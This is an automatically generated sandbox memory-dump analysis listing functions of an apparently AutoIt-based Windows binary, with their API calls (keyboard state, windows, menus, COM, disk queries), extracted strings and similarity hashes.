Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: a95291e760ce4df458ffbb09eb9a096caf767663353c3433f78197304f25ca99
Instruction ID: 0ba10d5a6bd7f678ac1e47e01cec4ac8d834e26e411549303142fc6aa404709b
Opcode Fuzzy Hash: a95291e760ce4df458ffbb09eb9a096caf767663353c3433f78197304f25ca99
Instruction Fuzzy Hash: 3FB11E75A00119AFDB04DFA4D889DAEBBF9FF49304B148469F90AEB261DB30ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001A052C, Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 001A05A7
SetKeyboardState.USER32(?), ref: 001A0612
GetAsyncKeyState.USER32(000000A0), ref: 001A0632
GetKeyState.USER32(000000A0), ref: 001A0649
GetAsyncKeyState.USER32(000000A1), ref: 001A0678
GetKeyState.USER32(000000A1), ref: 001A0689
GetAsyncKeyState.USER32(00000011), ref: 001A06B5
GetKeyState.USER32(00000011), ref: 001A06C3
GetAsyncKeyState.USER32(00000012), ref: 001A06EC
GetKeyState.USER32(00000012), ref: 001A06FA
GetAsyncKeyState.USER32(0000005B), ref: 001A0723
GetKeyState.USER32(0000005B), ref: 001A0731

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: aafa5ef34c90bbf4855ce8b6c214e84750e771cb27f875eb03b3768b0c415302
Instruction ID: 17ff052ca430500399391aa71df7f15fc701a4d4caa0760033b7e6c765e85c7c
Opcode Fuzzy Hash: aafa5ef34c90bbf4855ce8b6c214e84750e771cb27f875eb03b3768b0c415302
Instruction Fuzzy Hash: DD511B68E0478429FB36DBB088547EABFB59F17380F08459DC5C25B1C2DB64AB8CCB51

Uniqueness

Uniqueness Score: -1.00%

Function 0019C72A, Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0019C746
GetWindowRect.USER32 ref: 0019C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0019C7B6
GetDlgItem.USER32 ref: 0019C7C1
GetWindowRect.USER32 ref: 0019C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0019C827
GetDlgItem.USER32 ref: 0019C835
GetWindowRect.USER32 ref: 0019C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0019C889
GetDlgItem.USER32 ref: 0019C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0019C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0019C8C1

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: c80477ae42bb7b9983f79bbdb30febac4ad64e755144fdf638eaa8baef28ce1a
Instruction ID: 5b9ed0fca750bca07e05e80c2a16b1cd1c6987f0534a3cfc4752abdfa9332679
Opcode Fuzzy Hash: c80477ae42bb7b9983f79bbdb30febac4ad64e755144fdf638eaa8baef28ce1a
Instruction Fuzzy Hash: BA513D71B00205ABDF18CFA9DD99EAEBBBAEB88310F14812DF516D7290D770DD418B50

Uniqueness

Uniqueness Score: -1.00%

Function 0014201B, Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00141B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00142036,?,00000000,?,?,?,?,001416CB,00000000,?), ref: 00141B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001420D3
KillTimer.USER32(-00000001,?,?,?,?,001416CB,00000000,?,?,00141AE2,?,?), ref: 0014216E
DestroyAcceleratorTable.USER32 ref: 0017BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001416CB,00000000,?,?,00141AE2,?,?), ref: 0017BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001416CB,00000000,?,?,00141AE2,?,?), ref: 0017BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001416CB,00000000,?,?,00141AE2,?,?), ref: 0017BF5A
DeleteObject.GDI32(00000000), ref: 0017BF6C

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 2eca5fa056cf6f22483030f0e95f74d5ee2422b430bb6a617eaaab75b3dc519b
Instruction ID: bfe36ecdf123a7fdd76f5c31b865afd9db4527dcd3cd5c507d408473232fb4b5
Opcode Fuzzy Hash: 2eca5fa056cf6f22483030f0e95f74d5ee2422b430bb6a617eaaab75b3dc519b
Instruction Fuzzy Hash: 92615631104710DFCB299F14E988B2ABBF2FB50B16F508529F1468BAB1C775A8E5DF90

Uniqueness

Uniqueness Score: -1.00%

Function 001421A5, Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 001425DB: GetWindowLongW.USER32(?,000000EB), ref: 001425EC

GetSysColor.USER32(0000000F), ref: 001421D3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 7e2b7b7fa1aa8b2a4f4e640f63a728154c521119d56d8c39a279524ed8c72556
Instruction ID: f4260d642d2a8494ae1a63bb7033b3341330ea5405405b04c00a276c7d9daa66
Opcode Fuzzy Hash: 7e2b7b7fa1aa8b2a4f4e640f63a728154c521119d56d8c39a279524ed8c72556
Instruction Fuzzy Hash: 64416F35100550DEDB255F28EC88FB93B66EB06331FA88269FD658A1F6C7718CC2DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001AAB12, Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,001CF910), ref: 001AAB76
GetDriveTypeW.KERNEL32(00000061,001FA620,00000061), ref: 001AAC40
_wcscpy.LIBCMT ref: 001AAC6A

Strings

unknown, xrefs: 001AAC01
removable, xrefs: 001AABA8
fixed, xrefs: 001AABBE
ramdisk, xrefs: 001AABEA
cdrom, xrefs: 001AAB92
all, xrefs: 001AAB7C
network, xrefs: 001AABD4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 253e8d7b1d45bd52f5b4c7ccc74e1be1bd72885109e5b24d7c08bb775060fc5b
Instruction ID: d26abb26828bb895a6bf8ac1df77f2128324174e3b8bc06eda553953ddb0de95
Opcode Fuzzy Hash: 253e8d7b1d45bd52f5b4c7ccc74e1be1bd72885109e5b24d7c08bb775060fc5b
Instruction Fuzzy Hash: 2151C0341083059BC714EF54C891AAFB7A6EFA5310F94882DF596972A2DB31DD0ACB53

Uniqueness

Uniqueness Score: -1.00%

Function 001CC27C, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

Part of subcall function 00142344: GetCursorPos.USER32(?,?,002067B0,?,002067B0,002067B0,?,001CC247,00000000,00000001,?,?,?,0017BC4F,?,?), ref: 00142357
Part of subcall function 00142344: ScreenToClient.USER32 ref: 00142374
Part of subcall function 00142344: GetAsyncKeyState.USER32(00000002), ref: 00142399
Part of subcall function 00142344: GetAsyncKeyState.USER32(00000001), ref: 001423A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 001CC2E4
ImageList_EndDrag.COMCTL32 ref: 001CC2EA
ReleaseCapture.USER32 ref: 001CC2F0
SetWindowTextW.USER32(?,00000000), ref: 001CC39A
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001CC3AD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 001CC48F

Strings

@GUI_DROPID, xrefs: 001CC3E1
pr , xrefs: 001CC438
pr , xrefs: 001CC3FD
@GUI_DRAGFILE, xrefs: 001CC424

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$pr $pr
API String ID: 1924731296-888126259
Opcode ID: e53dedeb82b78f720fc505bd4ea0d4dfa02042bd79634930bb386e92b4a7e73a
Instruction ID: 3a96953396d63e156c96e5092a1dbd2bb511df0c0f032f326099f16ff670fd1f
Opcode Fuzzy Hash: e53dedeb82b78f720fc505bd4ea0d4dfa02042bd79634930bb386e92b4a7e73a
Instruction Fuzzy Hash: BA519C70204304AFD704DF24D89AF6A7BE5EBA8314F10852DF5958B2F2CB30E959CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001C73C1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001C73D9
CreateMenu.USER32 ref: 001C73F4
SetMenu.USER32(?,00000000), ref: 001C7403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001C7490
IsMenu.USER32 ref: 001C74A6
CreatePopupMenu.USER32 ref: 001C74B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001C74DD
DrawMenuBar.USER32 ref: 001C74E5

Strings

F, xrefs: 001C74D1
0, xrefs: 001C73CF

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: f27040cac3628e58aa036beadd89afecd7498a259405e5194376e50deb40400c
Instruction ID: a526cc217f768101a90b9c555dab51f8bdf553cfad628d52db5e8482fd6a7cac
Opcode Fuzzy Hash: f27040cac3628e58aa036beadd89afecd7498a259405e5194376e50deb40400c
Instruction Fuzzy Hash: 86411575A00209EFDB14DF64E888F9ABBB9FF59310F144029EA55973A0D771E924CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001C772A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 001C77CD
CreateCompatibleDC.GDI32(00000000), ref: 001C77D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 001C77E7
SelectObject.GDI32(00000000,00000000), ref: 001C77EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 001C77FA
DeleteDC.GDI32(00000000), ref: 001C7803
GetWindowLongW.USER32(?,000000EC), ref: 001C780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 001C7821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 001C782D

Strings

static, xrefs: 001C7765

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 37e27002b15a1743072875f75d88960eefdf5b6d19a3a0acd136475f3b7a609b
Instruction ID: 7e4742d5578fa16671b18eda8826120cbd34472edd5e309ccd09494ac48e7b3e
Opcode Fuzzy Hash: 37e27002b15a1743072875f75d88960eefdf5b6d19a3a0acd136475f3b7a609b
Instruction Fuzzy Hash: 58316B32105219BBDF119FA4DC09FDA3F6AFF19724F110229FA15A61E0C771D862DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00167040, Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0016707B

Part of subcall function 00168D68: __getptd_noexit.LIBCMT ref: 00168D68

__gmtime64_s.LIBCMT ref: 00167114
__gmtime64_s.LIBCMT ref: 0016714A
__gmtime64_s.LIBCMT ref: 00167167
__allrem.LIBCMT ref: 001671BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001671D9
__allrem.LIBCMT ref: 001671F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0016720E
__allrem.LIBCMT ref: 00167225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00167243
__invoke_watson.LIBCMT ref: 001672B4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 902e5011c8ca56bf1429e6211857f25baae1fd18bfb7d03b3863b0a2a1b26503
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 8B71DA71A04716ABD714AE79CC51B6AB3B8AF15728F14822AF914D72C1E770DA6087E0

Uniqueness

Uniqueness Score: -1.00%

Function 001A2A16, Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001A2A31
GetMenuItemInfoW.USER32(00206890,000000FF,00000000,00000030), ref: 001A2A92
SetMenuItemInfoW.USER32 ref: 001A2AC8
Sleep.KERNEL32(000001F4), ref: 001A2ADA
GetMenuItemCount.USER32 ref: 001A2B1E
GetMenuItemID.USER32(?,00000000), ref: 001A2B3A
GetMenuItemID.USER32(?,-00000001), ref: 001A2B64
GetMenuItemID.USER32(?,?), ref: 001A2BA9
CheckMenuRadioItem.USER32 ref: 001A2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A2C03
SetMenuItemInfoW.USER32 ref: 001A2C24

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 09ee6cbbd33460955dd5d18352588db1557f384b2e3c90c6adcb08ff311b8443
Instruction ID: 28d4430dcdcbcd7bb8663ebdf742cb937b7245a84f77da6d511525cb0a3308f3
Opcode Fuzzy Hash: 09ee6cbbd33460955dd5d18352588db1557f384b2e3c90c6adcb08ff311b8443
Instruction Fuzzy Hash: E061B1B8900249AFDB21CF68DD88EBEBBB9EB06314F140559F84197251D731EE46DB21

Uniqueness

Uniqueness Score: -1.00%

Function 001C7192, Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001C7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001C7217
GetWindowLongW.USER32(?,000000F0), ref: 001C723B
_memset.LIBCMT ref: 001C724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001C725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001C72D6

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 3dadbca817a6c6304d6a71313112575d6ad04aafba34c5eea9326a12c8cd226d
Instruction ID: a130bc9de4733b4d1a1ca8b8b04ffd6a6725d4c263844f3ac155a1e029d28a58
Opcode Fuzzy Hash: 3dadbca817a6c6304d6a71313112575d6ad04aafba34c5eea9326a12c8cd226d
Instruction Fuzzy Hash: 84615771A00248AFDB10DFA4CC85EEEB7F8AB19710F144159FA14A72E2C7B0AE55DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0019710E, Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00197135
SafeArrayAllocData.OLEAUT32(?), ref: 0019718E
VariantInit.OLEAUT32(?), ref: 001971A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 001971C0
VariantCopy.OLEAUT32(?,?), ref: 00197213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00197227
VariantClear.OLEAUT32(?), ref: 0019723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00197249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00197252
VariantClear.OLEAUT32(?), ref: 00197264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0019726F

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: db39df60887453cdc7c9626675d30a79744e6f326db68d7efe07d7e39277e5ea
Instruction ID: 017bdd5c3998f3fa6b6857aa3e5aa775ccde11b607ce6041f90cea48c2945ccd
Opcode Fuzzy Hash: db39df60887453cdc7c9626675d30a79744e6f326db68d7efe07d7e39277e5ea
Instruction Fuzzy Hash: DE415F35A10219AFCF04DFA4D848DAEBBB9FF58354F008069F915A7661CB30E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B86D0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

CoInitialize.OLE32 ref: 001B8718
CoUninitialize.OLE32 ref: 001B8723
CoCreateInstance.OLE32(?,00000000,00000017,001D2BEC,?), ref: 001B8783
IIDFromString.OLE32(?,?), ref: 001B87F6
VariantInit.OLEAUT32(?), ref: 001B8890
VariantClear.OLEAUT32(?), ref: 001B88F1

Strings

Invalid parameter, xrefs: 001B880F
NULL Pointer assignment, xrefs: 001B87C8
Failed to create object, xrefs: 001B878E, 001B8844

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 81d74279d43b4dd9d6dcc00f02880ebb36a4292dfc28e70fae5101a1b011c44e
Instruction ID: 83cd953f2881698144ef6f210ac1eb01560ffc4a72b0ef382beb09b19c7358fa
Opcode Fuzzy Hash: 81d74279d43b4dd9d6dcc00f02880ebb36a4292dfc28e70fae5101a1b011c44e
Instruction Fuzzy Hash: 2561AF70608301AFD714DF64C848FABBBE8AF59B14F54481DF9859B2A1CB70ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001AB72E, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001AB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001AB7B1
GetLastError.KERNEL32 ref: 001AB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 001AB828

Strings

UNKNOWN, xrefs: 001AB7E0
READONLY, xrefs: 001AB7F3
NOTREADY, xrefs: 001AB7E7
READY, xrefs: 001AB801
INVALID, xrefs: 001AB7FA

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 5a6134de519cef2fcef9eadad08fd65c584c439e08e386acbba82ff4faad8dac
Instruction ID: ccd9964d34606d2d5aae6e219d9416f6777ab6b03675e1de693088b1199949ed
Opcode Fuzzy Hash: 5a6134de519cef2fcef9eadad08fd65c584c439e08e386acbba82ff4faad8dac
Instruction Fuzzy Hash: E031C439A042499FDB00EFA8C8C5EBEBBB4FF96740F144029E505D72E2DBB59942C751

Uniqueness

Uniqueness Score: -1.00%

Function 00199471, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 0019B0C4: GetClassNameW.USER32 ref: 0019B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001994F6
GetDlgCtrlID.USER32 ref: 00199501
GetParent.USER32 ref: 0019951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00199520
GetDlgCtrlID.USER32 ref: 00199529
GetParent.USER32(?), ref: 00199545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00199548

Strings

ListBox, xrefs: 001994B3
ComboBox, xrefs: 0019947E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 7ec97b270561cc9a7da98bcfb77e0f9bb7b8f4cc60072e78d14694e851bab813
Instruction ID: 04fb3a03992a0ebcf7b55510390ff485bcbec60a192162c8ac5b009052637dc3
Opcode Fuzzy Hash: 7ec97b270561cc9a7da98bcfb77e0f9bb7b8f4cc60072e78d14694e851bab813
Instruction Fuzzy Hash: 0121C170900208BBDF05AB64CC85EFEBB75EF59300F10012AB961972E2DB759959DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0019955C, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 0019B0C4: GetClassNameW.USER32 ref: 0019B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001995DF
GetDlgCtrlID.USER32 ref: 001995EA
GetParent.USER32 ref: 00199606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00199609
GetDlgCtrlID.USER32 ref: 00199612
GetParent.USER32(?), ref: 0019962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00199631

Strings

ListBox, xrefs: 0019959E
ComboBox, xrefs: 00199569

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

